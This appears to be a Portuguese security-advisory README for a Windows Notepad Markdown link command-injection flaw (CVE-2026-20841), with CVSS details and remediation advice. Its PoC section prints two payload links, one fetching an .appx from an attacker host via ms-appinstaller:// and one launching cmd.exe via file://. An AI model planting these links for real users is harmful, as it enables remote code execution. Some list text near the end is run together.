
Prova de conceito demonstrando injeção de comandos no Bloco de Notas do Windows por meio de links Markdown maliciosos, permitindo execução remota de código. Inclui vetores de ataque, métricas CVSS e orientações de remediação.
| Campo | Detalhe |
|---|
| ID CVE | CVE-2026-20841 |
| Título | Vulnerabilidade de Execução Remota de Código no Aplicativo Bloco de Notas do Windows |
| Impacto | Execução Remota de Código |
| Severidade Máxima | Importante |
| CVSS v3.1 Base / Temporal | 8.8 / 7.7 |
| Vetor CVSS | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C |
| CWE | CWE-77: Neutralização Incorreta de Elementos Especiais usados em um Comando ('Injeção de Comando') |
| Produto Afetado | Aplicativo Bloco de Notas do Windows (versão Microsoft Store, builds anteriores a 11.2510) |
| CNA Designado | Microsoft |
| Publicado | 10 de fevereiro de 2026 |
| Divulgação Pública | Não |
| Explorado | Não |
| Avaliação de Explorabilidade | Exploração Menos Provável |
A neutralização incorreta de elementos especiais usados em um comando ('injeção de comando') no Aplicativo Bloco de Notas do Windows permite que um atacante não autorizado execute código por meio de uma rede.
O aplicativo moderno do Bloco de Notas do Windows (distribuído via Microsoft Store) introduziu suporte à renderização de Markdown, que inclui hiperlinks clicáveis. A vulnerabilidade existe porque o Bloco de Notas não valida e sanitiza adequadamente os esquemas de URI dentro de links Markdown antes de processá-los. Um atacante pode criar um arquivo .md malicioso contendo links especialmente formulados que, quando clicados pelo usuário, acionam manipuladores de protocolo não verificados para carregar e executar conteúdo remoto.
| Métrica | Valor |
|---|---|
| Vetor de Ataque | Rede |
| Complexidade do Ataque | Baixa |
| Privilégios Necessários | Nenhum |
| Interação do Usuário | Necessária |
| Escopo | Inalterado |
| Impacto na Confidencialidade | Alto |
| Impacto na Integridade | Alto |
| Impacto na Disponibilidade | Alto |
| Métrica | Valor |
|---|---|
| Maturidade do Código de Exploração | Não Comprovado |
| Nível de Remediação | Correção Oficial |
| Confiança no Relatório | Confirmado |
Como um atacante poderia explorar esta vulnerabilidade?
Um atacante poderia enganar um usuário para clicar em um link malicioso dentro de um arquivo Markdown aberto no Bloco de Notas, fazendo com que o aplicativo lance protocolos não verificados que carregam e executam arquivos remotos.
Qual é o contexto alvo da execução remota de código?
De acordo com a métrica CVSS, o vetor de ataque é rede (AV:N) e a interação do usuário é necessária (UI:R). O código malicioso seria executado no contexto de segurança do usuário que abriu o arquivo Markdown, dando ao atacante as mesmas permissões desse usuário.
.md) contendo hiperlinks maliciosos.ms-appinstaller://) que podem buscar e executar cargas úteis remotas, ou URIs file:// que podem iniciar diretamente executáveis locais.Aviso Legal: Esta prova de conceito é fornecida estritamente para fins educacionais e de pesquisa de segurança autorizada. Não use isto contra sistemas que você não possui ou para os quais não tenha permissão explícita por escrito para testar. O acesso não autorizado a sistemas de computador é ilegal e punível por lei.
A PoC demonstra dois vetores de ataque por meio de links Markdown criados:
Vetor 1 - Instalação de carga útil remota via abuso de manipulador de protocolo:
[Clique para visualizar o documento](ms-appinstaller://?source=https://attacker-controlled-domain/malicious.appx)
Vetor 2 - Invocação de executável local via URI de arquivo:
[Clique aqui](file://C:/windows/system32/cmd.exe)

.md de fontes não confiáveis no Bloco de Notas.As informações fornecidas neste repositório são apenas para fins educacionais e de pesquisa de segurança autorizada. Esta prova de conceito é compartilhada para ajudar defensores a entender e mitigar a vulnerabilidade. O autor não é responsável por qualquer uso indevido das informações ou ferramentas fornecidas aqui. Sempre obtenha autorização escrita adequada antes de testar vulnerabilidades em qualquer sistema. O acesso não autorizado a sistemas de computador é uma infração penal na maioria das jurisdições. Use com responsabilidade e ética.